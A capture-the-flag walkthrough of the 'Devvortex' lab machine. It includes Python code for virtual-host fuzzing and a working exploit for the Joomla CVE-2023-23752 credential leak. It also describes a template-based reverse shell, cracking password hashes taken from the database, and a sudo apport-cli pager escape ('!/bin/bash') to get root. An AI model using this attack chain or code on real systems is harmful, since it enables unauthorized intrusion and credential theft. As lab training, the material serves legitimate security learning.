Devvortex

This is my third attempt at writing this because I lost all my progress the other times, so if it’s not perfect, please excuse me. I have been extremely frustrated with it, but I refuse to not put it out.

I learned my lesson. Hit save often so you don’t go to sleep in tears from wasted time.

Reconnaissance:

So first, let’s start with our scan. I like to run nmap with -vvv (very verbose, so open ports print as they are found) for a quick first pass, and then gather more information based on what I get.

Now we scan the ports we gathered in more detail.

So we know we have a web server. Let’s add the hostname to /etc/hosts and check the web page.

After taking a look around the web page there isn’t much. There are no forms for injection, nothing sticks out, and there is no login page, so let’s directory bust. (I did check robots.txt. Always check it.)

And we ended up with a whole lot of nothing. Fantastic. However, if you can fuzz forward into directories, remember that you can also fuzz sideways into subdomains: the same IP may serve other virtual hosts that only answer to the right Host header.

My tool of choice for this is ffuf, but you can use other tools like gobuster or sublist3r.

Go ahead and steal the command above.

After running the subdomain fuzz we get a lot of fluff: every name that doesn’t exist gets the same default response.

The size of that default response is 154 bytes, so let’s filter it out with the -fs switch (filter by response size).
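The same idea in code, as an added example that is not part of the original write-up: send one request per candidate name to the same IP, vary only the Host header (which is what ffuf -H 'Host: FUZZ.domain' does and why no /etc/hosts entries are needed), and drop every response that matches the “no such vhost” baseline. The domain devvortex.htb and the sample responses in sample_fetch are assumptions constructed for the demo, not captured from the box.

```python
"""Virtual-host fuzzing with a response-size filter (added example)."""
import urllib.error
import urllib.request
from collections import Counter
from typing import Callable, Iterable

# A fetcher maps a Host header value to (HTTP status, body length in bytes).
Fetch = Callable[[str], tuple[int, int]]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep 3xx responses as-is. A redirect to the canonical host is itself a
    signal, and following it would mean resolving names we never added."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_fetch(ip: str, port: int = 80, timeout: float = 5.0) -> Fetch:
    """Build a fetcher that requests http://ip:port/ with a chosen Host header.

    Name-based virtual hosting is decided purely by the Host header the
    server receives, so neither DNS nor /etc/hosts is involved.
    """
    opener = urllib.request.build_opener(_NoRedirect)

    def fetch(host: str) -> tuple[int, int]:
        req = urllib.request.Request(f"http://{ip}:{port}/", headers={"Host": host})
        try:
            with opener.open(req, timeout=timeout) as resp:
                return resp.status, len(resp.read())
        except urllib.error.HTTPError as err:
            # 3xx/4xx/5xx still carry a body; its size is what we filter on.
            return err.code, len(err.read())

    return fetch


def find_vhosts(words: Iterable[str], domain: str, fetch: Fetch) -> list[str]:
    """Return the candidate subdomains whose response differs from the baseline.

    The baseline is the most common (status, size) pair across all
    candidates, so the wordlist must be long enough that misses dominate.
    Noticing that every miss is 154 bytes and passing -fs 154 to ffuf is
    the manual version of the same filter.
    """
    results = {word: fetch(f"{word}.{domain}") for word in words}
    if not results:
        return []
    baseline = Counter(results.values()).most_common(1)[0][0]
    return sorted(word for word, result in results.items() if result != baseline)


# Constructed sample: every miss gets the same 154-byte redirect, only "dev"
# answers with a real page. Replace with http_fetch("<target-ip>") for a live run.
SAMPLE_RESPONSES = {"dev.devvortex.htb": (200, 23221)}


def sample_fetch(host: str) -> tuple[int, int]:
    return SAMPLE_RESPONSES.get(host, (301, 154))


if __name__ == "__main__":
    print(find_vhosts(["www", "dev", "mail", "api", "staging"], "devvortex.htb", sample_fetch))
```

The redirect handler matters on a live target: urllib follows 3xx by default, and a redirect to the canonical hostname would fail to resolve before you ever saw the 154-byte body you want to filter on.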

We got dev. Sweet, let’s add it to /etc/hosts and check it.

Let’s navigate to it and check /robots.txt.

(I know there is a better way to deal with virtual hosting and subdomains so you don’t have to add each individual one to /etc/hosts. I learned it from an OffSec stream and I don’t know where I wrote it down. Noob move.)

Is that an admin panel?

Foothold:

It is in fact an admin login. I tried default creds but got nowhere. I also read some of the documentation linked under “forgot your login details”. As I was reading I realized I didn’t know the version, which I would need in order to research exploits.

So I did some research on finding the version and used that. Thank you, HackTricks.

Version 4.2.6. Now we have something. Time to go research.

I found an exploit for CVE-2023-23752 (an unauthenticated information disclosure in the web-services API that, among other things, leaks the database configuration), but I don’t remember the random site I got it from, as that got lost in the first version of this write-up.

Leveraging the exploit we get the result above. But the raw JSON looks like dogwater; we can make it look better.

We pipe the output to jq.

Now isn’t that way prettier? If you scroll down you will see the database password nicely stored for your viewing pleasure.
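To tie the version check and the CVE together, here is an added example (not code from the original write-up or from any exploit site). It relies on two facts: Joomla 4 publishes its version in /administrator/manifests/files/joomla.xml, and CVE-2023-23752 (Joomla 4.0.0 through 4.2.7, fixed in 4.2.8) is an improper access check that lets an unauthenticated client read /api/index.php/v1/config/application?public=true, which includes the database user and password. The XML and JSON samples below are constructed, with placeholder credentials and table prefix rather than the box’s real values; the target URL is left as a placeholder.

```python
"""Joomla version check and CVE-2023-23752 config read (added example)."""
import json
import urllib.request
import xml.etree.ElementTree as ET

VERSION_PATH = "/administrator/manifests/files/joomla.xml"
CONFIG_PATH = "/api/index.php/v1/config/application?public=true"

# Constructed, trimmed sample of joomla.xml.
SAMPLE_JOOMLA_XML = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
  <name>files_joomla</name>
  <author>Joomla! Project</author>
  <version>4.2.6</version>
</extension>
"""

# Constructed, trimmed sample of the API response. The endpoint returns one
# resource object per config key, all with the same id, which is why the raw
# output is so long and the password only shows up after scrolling.
SAMPLE_CONFIG_JSON = json.dumps({
    "links": {"self": "http://dev.example.htb" + CONFIG_PATH},
    "data": [
        {"type": "application", "id": "224", "attributes": {"offline": False}},
        {"type": "application", "id": "224", "attributes": {"sitename": "Development"}},
        {"type": "application", "id": "224", "attributes": {"dbtype": "mysqli"}},
        {"type": "application", "id": "224", "attributes": {"host": "localhost"}},
        {"type": "application", "id": "224", "attributes": {"user": "dbuser_placeholder"}},
        {"type": "application", "id": "224", "attributes": {"password": "S3cret_placeholder"}},
        {"type": "application", "id": "224", "attributes": {"db": "joomla"}},
        {"type": "application", "id": "224", "attributes": {"dbprefix": "abc12_"}},
    ],
})


def fetch_text(base_url: str, path: str, timeout: float = 10.0) -> str:
    """GET base_url + path and return the body as text (live use only)."""
    with urllib.request.urlopen(base_url.rstrip("/") + path, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_joomla_version(xml_text: str) -> str:
    """Pull the <version> element out of the joomla.xml manifest."""
    version = ET.fromstring(xml_text).findtext("version")
    if not version:
        raise ValueError("no <version> element in manifest")
    return version.strip()


def affected_by_cve_2023_23752(version: str) -> bool:
    """True for 4.0.0 <= version < 4.2.8 (4.2.8 is the fixed release)."""
    parts = tuple(int(p.split("-")[0]) for p in version.split(".")[:3])
    return (4, 0, 0) <= parts < (4, 2, 8)


def parse_config_attributes(json_text: str) -> dict:
    """Merge every resource object's attributes into one flat dict.

    Handles both the list form the API returns and a single-object form,
    so this agrees with `jq '.data[].attributes'` on the real output.
    """
    data = json.loads(json_text)["data"]
    objects = data if isinstance(data, list) else [data]
    merged: dict = {}
    for obj in objects:
        merged.update(obj.get("attributes", {}))
    return merged


def db_credentials(attrs: dict) -> dict:
    """Only the keys needed to try the database: user, password, host, db, prefix."""
    return {k: attrs.get(k) for k in ("user", "password", "host", "db", "dbprefix")}


if __name__ == "__main__":
    # Offline run on the constructed samples. For a live target, replace them with
    # fetch_text("http://<target-host>", VERSION_PATH) and
    # fetch_text("http://<target-host>", CONFIG_PATH).
    version = parse_joomla_version(SAMPLE_JOOMLA_XML)
    print(f"Joomla {version}, affected by CVE-2023-23752: {affected_by_cve_2023_23752(version)}")
    print(db_credentials(parse_config_attributes(SAMPLE_CONFIG_JSON)))
```

Checking the version before firing the request is the step the write-up describes in prose: the endpoint is only readable without a token on the affected releases, so a 4.2.8+ target should make you look elsewhere rather than retry.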

I immediately tried the creds against the SSH service we found in our nmap scan. That failed, but we had the admin page, so I logged in there and it worked like a charm. (Password reuse between the database and the CMS admin account is what turns this disclosure into a foothold rather than just a leak.)

Once in the panel I knew there was a way to get a reverse shell, because I have done it before.

In the templates section, do you see how it says “Site Templates” and “Administrator Templates”? Yeah, that’s awesome. I did not see this for the longest time and could not understand for the life of me why I could not edit the site templates as an administrator.

Don’t be like me.

Exploitation:

This is the correct admin template you want.

Using that I was able to pop a shell. Once I got in I enumerated the machine, and one thing I found was a MySQL service running. We had creds, so we might as well try them.

Again, this is where I lost one of the pictures I initially had for you, but poof, the computer deleted them.

So we were able to log in.

Now I’m a big fan of just dumping everything from a table because... well, I’m lazy, if we’re being honest, but this looked like crap.

I went ahead and made it just a little bit better by selecting only the columns we needed. I think it’s better to work with everything and then tune it down to what you need anyway.

Now we know we can crack this... or at least we should be able to. I have the hash-cracking book on my desk here so I looked at that, but if you read the hashcat man page it should tell you which mode to use.

You could use John the Ripper as an alternative; up to you.

We got a new password. Let’s try to use it to log in over SSH, then do some recon if it works.

It worked.

I like to run sudo -l, whoami, uname -a, ifconfig, netstat -ano, ps -ef and getcap -r / 2>/dev/null before doing anything else. You can also start transferring tools like linpeas, but I like manual gathering.

sudo -l gives us /usr/bin/apport-cli. Nice. We need a version.

After doing some research I found that you can exploit the

sudo -l shows what we are allowed to run with elevated privileges. We can use /usr/bin/apport-cli, but I spent so much time looking for how to generate a crash file that it’s embarrassing.

Finally, I tried just using the program itself with the -f option (start in bug-filing mode).

It can literally generate the report for you.

Privilege Escalation:

Let’s just pick 1 and see what happens.

Now let’s go forward and press 3 (to be completely honest this was a misclick and I meant to press 2, but let’s just go with it).

When you get to the final menu, press “V” to view the report. This opens it in a pager.

Now type !/bin/bash at the pager prompt and you get root. The pager was spawned by apport-cli, which sudo ran as root, so the shell it launches inherits that. This is the classic pager escape: any sudo-allowed program that hands its output to less is dangerous unless less is run in secure mode (LESSSECURE=1), which disables the ! command.

Now do what you do. We are root.

Post Exploitation:

Grab that flag.

As always, stay curious my friends.
